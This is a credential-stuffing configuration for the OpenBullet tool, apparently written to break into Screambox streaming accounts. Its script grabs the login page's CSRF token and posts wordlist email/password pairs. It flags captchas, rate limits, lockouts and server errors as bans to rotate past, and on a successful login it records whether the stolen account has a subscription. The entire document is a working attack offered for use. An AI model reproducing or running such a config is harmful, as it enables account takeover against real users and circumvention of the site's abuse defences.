[SETTINGS]
{
  "Name": "screambox",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-07-07T12:28:19.7663701-04:00",
  "AdditionalInfo": "",
  "Author": "mcd",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.screambox.com/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" CSS "meta[name=\"csrf-token\"]" "content" -> VAR "tok" 

FUNCTION Length "<tok>" -> VAR "len" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Ban OR 
    KEY "<len>" EqualTo "0" 

REQUEST POST "https://www.screambox.com/login" 
  CONTENT "email=<USER>&authenticity_token=<tok>&utf8=%E2%9C%93&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY " you entered incorrect email address or password" 
    KEY "Sign in - Screambox" 
  KEYCHAIN Ban OR 
    KEY "Error (500)</" 
    KEY "captcha" 
    KEY "You are banned from logging in for another" 
    KEY "<RESPONSECODE>" EqualTo "504" 
    KEY "<RESPONSECODE>" EqualTo "502" 
    KEY "<HEADERS(Content-Length)>" EqualTo "0" 
    KEY "<RESPONSECODE>" EqualTo "503" 
    KEY "<RESPONSECODE>" EqualTo "500" 
    KEY "<RESPONSECODE>" EqualTo "501" 
    KEY "<RESPONSECODE>" EqualTo "505" 
    KEY "<RESPONSECODE>" EqualTo "511" 
    KEY "<RESPONSECODE>" EqualTo "429" 
    KEY "<RESPONSECODE>" EqualTo "429" 
  KEYCHAIN Success OR 
    KEY "Sign out" 

PARSE "<SOURCE>" LR "user_has_subscription: \"" "\"" -> CAP "sub" 

